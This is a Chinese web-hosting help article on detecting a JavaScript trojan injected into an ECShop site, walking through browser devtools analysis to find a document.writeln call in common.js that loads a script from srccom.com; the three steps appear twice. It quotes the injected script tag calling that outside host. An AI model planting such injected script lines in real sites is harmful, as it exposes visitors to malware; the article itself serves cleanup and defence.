新梦想网络弹性云主机被挂马的检测步骤
最近一台云主机被检查到挂马,提交给新梦想网络收费工单检查处理后,询问到了新梦想网络检查js挂马的步骤:(以ecshop被挂srccom.com/SRC.SRC为例)
1,打开被挂马的网站,用google浏览器开发者工具分析。
2,分析发现网站打开的时候在加载http://srccom.com/SRC.SRC 这个地址,而查看首页源码并无此相关代码,在浏览器输出的源代码是静态的,只有js能实现隐藏的地址,所以分析到时挂马到了js文件中。
3,查看所有首页加载的几个js代码中的打印代码,搜索document.write或者document.alert 等等,只有common.js中有document.writeln,将该代码后面的strgAttribute输出查看即是<script src="http://srccom.com/SRC.SRC">由此判断进行处理注释该打印代码。
1,打开被挂马的网站,用google浏览器开发者工具分析。
2,分析发现网站打开的时候在加载http://srccom.com/SRC.SRC 这个地址,而查看首页源码并无此相关代码,在浏览器输出的源代码是静态的,只有js能实现隐藏的地址,所以分析到时挂马到了js文件中。
3,查看所有首页加载的几个js代码中的打印代码,搜索document.write或者document.alert 等等,只有common.js中有document.writeln,将该代码后面的strgAttribute输出查看即是<script src="http://srccom.com/SRC.SRC">由此判断进行处理注释该打印代码。
相关问题
下载此文章 (欢迎转载,请注明出处:http://www.xmxwl.net/help/member/20140320/13263.html)
- 下一篇:弹性云主机使用说明
- 上一篇:新梦想网络弹性云主机:用户使用须知